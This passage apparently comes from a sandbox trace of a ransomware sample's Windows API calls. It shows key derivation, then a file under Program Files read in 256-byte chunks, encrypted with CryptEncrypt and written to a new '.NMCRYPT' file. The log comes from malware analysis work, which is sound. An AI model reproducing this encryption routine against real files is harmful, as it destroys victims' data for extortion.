out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.018] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.019] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0170.019] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0170.019] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0170.020] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0170.020] CryptHashData (hHash=0x9ad478, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0170.020] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad138) returned 1 [0170.020] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0170.020] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0170.020] wcslen (_String="\\\\?\\") returned 0x4 [0170.021] CryptDuplicateKey (in: hKey=0x9ad138, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad2f8) returned 1 [0170.021] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0170.022] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\System\\Ole DB\\en-US\\sqloledb.rll.mui" (normalized: "c:\\program files\\common files\\system\\ole db\\en-us\\sqloledb.rll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0170.022] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=44544) returned 1 [0170.022] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0170.023] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.072] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.072] GetLastError () returned 0x0 [0170.072] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.073] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.073] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.073] GetLastError () returned 0x0 [0170.073] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.073] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.073] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.073] GetLastError () returned 0x0 [0170.073] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.073] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.074] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.074] GetLastError () returned 0x0 [0170.074] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.074] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.074] GetLastError () returned 0x0 [0170.074] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.074] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.074] GetLastError () returned 0x0 [0170.074] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.074] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.074] GetLastError () returned 0x0 [0170.074] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.074] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.074] GetLastError () returned 0x0 [0170.074] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.074] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.075] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.075] GetLastError () returned 0x0 [0170.075] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.075] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.075] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.075] GetLastError () returned 0x0 [0170.075] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.075] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.075] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.075] GetLastError () returned 0x0 [0170.075] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.075] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.075] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.075] GetLastError () returned 0x0 [0170.076] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.076] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.076] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.076] GetLastError () returned 0x0 [0170.076] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.076] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.076] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.076] GetLastError () returned 0x0 [0170.076] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.076] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.077] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.077] GetLastError () returned 0x0 [0170.077] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.077] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.077] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.077] GetLastError () returned 0x0 [0170.077] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.077] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.148] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.148] GetLastError () returned 0x0 [0170.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.148] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.148] GetLastError () returned 0x0 [0170.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.148] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.148] GetLastError () returned 0x0 [0170.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.148] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.148] GetLastError () returned 0x0 [0170.148] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.148] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.148] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.148] GetLastError () returned 0x0 [0170.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.149] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.149] GetLastError () returned 0x0 [0170.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.149] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.149] GetLastError () returned 0x0 [0170.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.149] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.149] GetLastError () returned 0x0 [0170.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.149] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0170.149] GetLastError () returned 0x0 [0170.149] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0170.149] ReadFile (in: hFile=0x15b0, lpBuffer=0x2893368, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x2893368*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0170.150] CryptEncrypt (in: hKey=0x9ad2f8, 